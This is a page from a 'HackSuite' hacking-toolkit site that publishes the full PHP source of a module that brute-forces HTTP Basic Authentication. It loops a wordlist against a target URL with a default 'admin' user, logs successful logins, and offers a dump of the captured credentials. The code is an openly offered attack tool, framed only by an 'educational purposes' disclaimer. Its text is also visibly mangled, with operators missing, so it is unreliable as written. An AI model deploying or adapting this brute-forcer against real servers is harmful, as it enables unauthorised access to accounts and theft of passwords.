random gallery image
random tutorial
preview

..tutorial we are going to create a new app for the hacksuite. We're not going to do anything fancy here, we will make a simple app to get familiar how to write compatible scripts for the..

read more

random other
xConverter

THC xConverter is a tool that makes use of (php) functions in order to calculate, fetch, convert and encrypt data

more about this module
more of this category
more modules

HackSuite File Library
File Library
Here you can find the latest files and structure of the THC HackSuite, note that if you have an earlier version of the suite it's not recommended to update files manually. Instead you should overwrite your existing HackSuite environment.
<?php
/*
Handler for HTTP Auth

Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 13-04-2015
*/
// set variable to be able to save a task
$_MODULE_C "thc_ht";
$_LOG "accounts.php";
include_once(
"../../Includes/screen_header.php");
include_once(
$_PATHS['style_root']."/screen.php");
include_once(
$_PATHS['functions_root']."/scrn.php");
include_once(
$_PATHS['functions_root']."/fwrite.php");
// options
$sOptions "<b>logging:</b> ".($_CONTEXT['log']==true "on" "off")."<br>\n";
$sOptions .= "<b>silence:</b> ".($_CONTEXT['silent']==true "on" "off")."<br>\n";
$sOptions .= "<b>verbose:</b> ".($_CONTEXT['verbose']==true "on" "off")."\n";
if(isset(
$_POST['submit']) && $_POST['submit']!="Dump Log" && $_POST['submit']!="Clean Log"){
    
// don't you just hate using post variables directly? Uhm I do.. ;)
    
$sUser = ($_POST['sUser']=="" "admin" "");
    
$sScanUrl $_POST['sScanUrl'];
    
$sWordlist $_POST['sWordlist'];
    if(
$_POST['submit']=="Test"){
        
$sScanUrl str_replace("/thc_ht","",$_PATHS['servers_root_http']."/http_authenticate.php");
    }
    
// first of all let's see if the url looks valid..
    
$aUrl parse_url($sScanUrl);
    if(!isset(
$aUrl['host']) || !strlen($aUrl['host'])){
        die(
Screen($sOut."Invalid target specified.".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    if(
$sWordlist!=""){
        
$sFile ExploitFilter($_PATHS['wordlists_root']."/".$sWordlist,0,1);
        if(!
file_exists($sFile) || !@filesize($sFile)){
            die(
Screen($sOut."Expecting a valid filepath to a non empty wordlist.".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
        }
    }
    else{
        die(
Screen($sOut."Select a wordlist you want to use.".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    
$aWordlist file($sFile);
    
$iLoops count($aWordlist);
}
if(isset(
$_POST['submit'])){
    
// made this switch for extra future options
    
switch($_POST['submit']){
        
// this will test this script against the test server (TestServer/http_authenticate.php)
        
case"Test":
        
$_POST['submit'] = "Bruteforce";
        
// start task enter
        
case"Bruteforce":
        include_once(
$_PATHS['includes_root']."/task_start.php");
        echo 
$sOut;
        break;
        
// Dump Log
        
case"Dump Log":
        echo 
$sOut;
        if(!
function_exists("RawToArray")){
            include_once(
$_PATHS['functions_root']."/raw_to_array.php");
        }
        if(
false==($aKeys RawToArray($_LOG))){
            echo
"<b id=h7>[no passwords found yet]</b>";
        }
        else{
            for(
$x=0;$x<count($aKeys);$x++){
                echo
"<b>[".$aKeys[$x][0]."]</b> (".date($_CONTEXT['time_pattern'].' H:i:s',$aKeys[$x][1]).") =&gt; (u)".$aKeys[$x][2]." (p) ".$aKeys[$x][3]."<br>\n";
            }
        }
        exit;
        break;
        
// Clean Log
        
case"Clean Log":
        echo 
$sOut;
        echo (
WriteF($_LOG,"","w") ? "Successfully cleaned log" "Failed to clean log");
        echo 
$sEnd;
        exit;
        break;
        
// just show index
        
default:
        echo 
$sOut;
        echo 
$sOptions;
        echo 
$sEnd;
        exit;
    }
}
else{
    echo 
$sOut;
    echo 
$sOptions;
    echo 
$sEnd;
    exit;
}
// okidoki let's prepare the task
echo Screen("<br>\n<b>Running thc_ht @ ".$aUrl['scheme']."://".$aUrl['host'].@$aUrl['path']."</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// spit fire...
flush();
ob_flush();
// keep track of status
$bFound false;
$iPadding strlen($iLoops);
$y 1;
$sRequest "";
// let's get this thing in action
for($x=0,$y=1;$x<$iLoops;$x++,$y++){
    
// make a connection and get the response
    
$ch curl_init();
    
$aWordlist[$x] = trim($aWordlist[$x]);
    
$sRequest $sUser.":".$aWordlist[$x];
    
curl_setopt($chCURLOPT_URL$sScanUrl);
    
curl_setopt($chCURLOPT_USERPWD$sRequest);
    
curl_setopt($chCURLOPT_FOLLOWLOCATION,1);
    
curl_setopt($chCURLOPT_HEADER,1);
    
curl_setopt($chCURLOPT_RETURNTRANSFER,1);
    
$sResponse curl_exec($ch);
    
curl_close($ch);
    
// connection closed.. let's see what we have here..
    
if(preg_match('/404 Not Found/',$sResponse)){
        
// page doesn't exist, it's in the loop just in case the admin takes the page down if he finds out he's under attack
        
echo Screen("<br />\nTarget file doesn't exist!<br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
        break;
    }
    
// for markup's sake so the output will look better
    
$iYLen $iPadding-strlen($y);
    
$sAttempt = ($iYLen!=str_repeat("0",$iYLen) : "").$y;
    echo 
Screen("[".$sAttempt."] trying ".$sRequest." =&gt; ",$_CONTEXT['verbose'],$_CONTEXT['silent']);
    if(!
preg_match('/200 OK/',$sResponse)){
        
// no access
        
echo Screen("unauthorized<br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
    }
    else{
        
// bingo
        
echo Screen("<b>logged in</b><br>\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
        
$bFound true;
        if(
$_CONTEXT['log']==true){
            
WriteF($_LOG,trim($sScanUrl)."|".time()."|".$sUser."|".$aWordlist[$x]."\n");
        }
        break;
    }
    
flush();
    
ob_flush();
}
echo 
Screen("<p><b>attempts:</b> ".$y." => ".($bFound==true $sRequest "no success")." (running time) ".(time()-$_CONTEXT['start_task'])."(s)\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
// update entry in background task file
include_once($_PATHS['includes_root']."/task_end.php");
echo 
$sEnd;
?>
powered by
site stats
cms statistics:
version: 0.6.0
downloads: 3837
native: 26
modules: 21
apps: 2
support development
It takes lots of calories in order to create new things for the hacksuite, so it would be grand if you could buy me a protein shake or extra energy to keep me going. Thanks!
disclaimer
We are not responsible for any direct or indirect damage caused by abusing the tools provided on hacksuite.com. The suite is developed for educational purposes, use at your own risk!
Created by Remco Kouw. Powered by protein shakes and a high calorie diet.